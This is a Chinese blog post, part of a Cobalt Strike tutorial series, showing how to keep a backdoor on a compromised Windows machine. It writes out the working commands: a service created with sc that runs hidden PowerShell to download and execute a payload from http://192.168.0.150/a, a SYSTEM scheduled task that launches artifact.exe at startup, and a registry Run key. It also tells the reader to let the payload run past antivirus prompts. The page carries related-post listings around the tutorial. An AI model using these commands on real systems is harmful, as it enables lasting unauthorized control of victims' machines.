Cobalt Strike 可持续后门的使用(子篇9)

最新推荐文章于 2024-02-23 08:00:47 发布
最新推荐文章于 2024-02-23 08:00:47 发布
阅读量636 收藏
点赞数
分类专栏: 渗透工具Cobalt Stike使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127996590
版权

1.服务自启动  powershell有可能被防火墙拦截     

sc create“Windows Power”binpath=“cmd /c start powershell.exe -nop -w hidden -c \”     

IEX((new-object net.webclient).downloadstring('http://192.168.0.150:80/a'))\"" 

这边做一个启动  

 此时进行了拦截     

 

再来重新做一下,并且把会话sleep调试为0 

 杀毒软件此时跳出来的话,此时程序阻止暂时不处理  

sc config "Windows Power"start=auto   让系统启动的时候此sc服务就启动

sc description "Windows Power" "windows auto service"   

net start "Windows Power"   

允许运行      

这个时候就多出了一台会话

sc delete "Windows Power"       

演示:

木马文件 

sc create “server power” binpath=“C:\User\Administrator\Desktop\artifact.exe”

sc description “server power” “description”设置服务的描述字符串

sc config “server power” start=auto 设置这个服务为自动启动

net star“server power” 启动服务

2.计划任务

        创建任务

       schtasks/create/tn “windowsup”/tr“C:\artifact.exe”/ru SYSTEM /sc onstart

     删除任务

      schtasks /delete  /tn windowsup   

      查询任务 

     schtasks /query /tn windowsup

     chcp 437 无法载入列表 请修改字符集    

      手工运行任务  

     schtasks /run /tn test3  

    

 因为是系统权限,可以看进程任务

 可以 Token令牌窃取

3.注册表启动

 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Keyname”

/t REG_SZ /d  "/C:\artifact.exe"/f   

然后重启机子,这边的话就会自动开启之前设置的会话服务     

jack-yyj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CobaltStrike4.4.zip
09-15
`cobaltstrike.exe`和`cobaltstrike.jar`是Cobalt Strike的主要执行文件,分别代表Windows可执行文件和Java应用程序,用户可以通过它们启动Cobalt Strike的控制台界面。 总的来说,这个压缩包提供了Cobalt Strike ...
CobaltStrike后门生成
bring_coco的博客
05-05 4063
一.Payload介绍 Payload在渗透测试中大家可以简单地理解为一段漏洞利用/植入后门的代码或程序 二.Cobaltstrike生成后门 1.HTML Application(生成基于HTML的攻击载荷,比如可执行文件,Powershell,VBA) HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差
网络攻防作业——学习使用cobaltStrike
yyy7654321的博客
06-28 951
生成Windows下可执行木马(一个有英语版的图,一个中文版的),放在指定的地方。在放在window系统的电脑中运行软件,在弹出阻止消息的时候点击信任运行。3.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享下载该后门,运行后门上线。2.利用Cobaltstrike生成攻击后门,并通过2种网络共享下载该后门,运行后门上线;1.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享。实验工具:VMware,edge,cs。1.登录cs,并生成后面放在指定路径。
逆向分析Cobalt Strike安装后门
最新发布
pandazhengzheng的博客
02-23 1248
逆向分析Cobalt Strike安装后门
153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]
qwsn
03-25 2461
一、后门简介 1、hta后门 2、exe后门 3、宏病毒后门 二、生成后门并测试 1、生成HTA后门并测试 2、生成exe后门并测试 3、生成宏病毒后门并测试
应急响应.windows
newlife1441的博客
08-19 1588
应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全。主要是为了人们对网络安全有所认识、有所准备,以便应对突发的网络安全事件windowsWeb 入侵:网页挂马、主页篡改、Webshell系统入侵:病毒木马、勒索软件、远控后门网络攻击:DDOS 攻击、DNS 劫持、ARP 欺骗。
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
cobalt strike 4.7
06-07
为了充分利用Cobalt Strike 4.7,使用者需要对网络攻击的生命周期有深入理解,包括侦察、持久化、权限提升、防御规避、凭证访问、横向移动、收集和外联。此外,熟悉相关的操作系统和网络协议知识,以及基本的编程和...
CobaltStrike逆向学习系列-主线篇
02-22
通过逆向的方式分析 CobaltStrike,包含 bypass、检测 等内容,是深入了解和二次开发,非常好的参考资料
Cobalt Strike后渗透神器入门
2301_77147676的博客
03-27 288
你需要掌握的三大神器,metasploit、empire、cobalt strike。在前面的实验中,我们分别介绍了(漏洞利用)和empire(后门控制)。今天的主题是个,或许你早在上就看到过这个黄毛小,kali自带的metasploit图形版软件:armitage。cobalt strike是armitage的升级版,跟着本篇文章,一起来捉个鸡啦,静享丝滑~作者:ailx10链接:https://zhuanlan.zhihu.com/p/261147503来源:知乎著作权归作者所有。
魔改CobaltStrike:二开及后门生成分析
mai1zhi2的博客
04-21 3049
一、概述: 这次文章主要介绍下Cobalt Strike 4.1相关功能的二开和后门(artifact.exe\beacon.exe)的生成方式,Cobalt Strike的jar包我已反编译,并改了下反编译后的bug,teamserver与agressor均能正常调试使用,附反编译后项目地址: https://github.com/mai1zhi2/CobaltstrikeSource 。若有不对的地方希望大伙指出,谢谢。后续将会再分享通讯协议与自定义客户端(后门)。PS:感谢Moriarty的分享课。
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
二次元怪兽的博客
08-07 766
默认会有一个已经建立的好的监听配置我们可以修改它 或者添加一个新的监听配置。
捆绑后门的艺术--CobaltStrike backdoor分析
systemino的博客
08-06 2072
CobaltStrike(以下全部简称为CS)是渗透测试中常用的一个后渗透工具,它可以快速地生成后门并通过其控制目标主机。其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及免杀效果。下面,就来剖析一下该类后门的捆绑及免杀原理。 1.后门制作 制作捆绑型后门前,先得创建一个监听器用于与后门通信,点击 Cobalt Strike->Listener创建一个监听器,填上IP...
cobaltstrike之创建监听器与生成后门
热门推荐
good good study
06-24 1万+
创建监听器Listener 什么时候需要创建一个监听器了,比如我们拿到一个shell。此时我们就需要用cs生成一个payload传入到目标服务器上来,这个payload要与服务器进行连接就需要服务器先开启一个监听,payload才能找到服务器。 如下进行点击,然后在最下面点击add,进行监听器的添加 页面配置信息如下 name:为监听器名字,可任意 payload:payload类型 HTTP Hosts: shell反弹的主机,也就是我们kali的ip(如果是阿里云,则填阿里云主机的公网ip
cs powershell无文件落地利用
xxx9686的博客
09-19 911
【代码】cs powershell无文件落地利用。
Cobalt Strike(十八)可持续后门使用
qq_56426046的博客
09-26 552
sc description "server power" "description" 设置服务的描述字符串sc config "server power" start= auto 设置这个服务为自动启动net start "server power" 启动服务。
CobaltStrike逆向学习系列(6):Beacon sleep_mask 分析
SecSource_Stars的博客
01-11 406
这是[信安成长计划]的第 6 篇文章 关注微信公众号[信安成长计划] 0x00 目录 0x01 C2Profile 分析 0x02 set userwx “true” 0x03 set userwx “false” CobaltStrike 提供了一个内存混淆功能,它会在 Sleep 的时候将自身混淆从而避免一定的检测 0x01 C2Profile 分析 因为 sleep_mask 是从 C2Profile 中设置的,所以就需要先搞清楚 TeamServer 是如何解析的 很明显它还跟其他的设置项有关,
【内网安全】Cobalt Strike 使用
qq_44657899的博客
07-12 2255
文章目录Beacon命令argue参数污染 Beacon命令 argue参数污染 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Argue execute net1 user test test123 /add execute net1 localgroup administrators test /add argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [com
c++课程设计基于反弹socket通信的windows系统后门实现-毕业论文.doc
07-04
c++课程设计基于反弹socket通信的windows系统后门实现-毕业论文.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值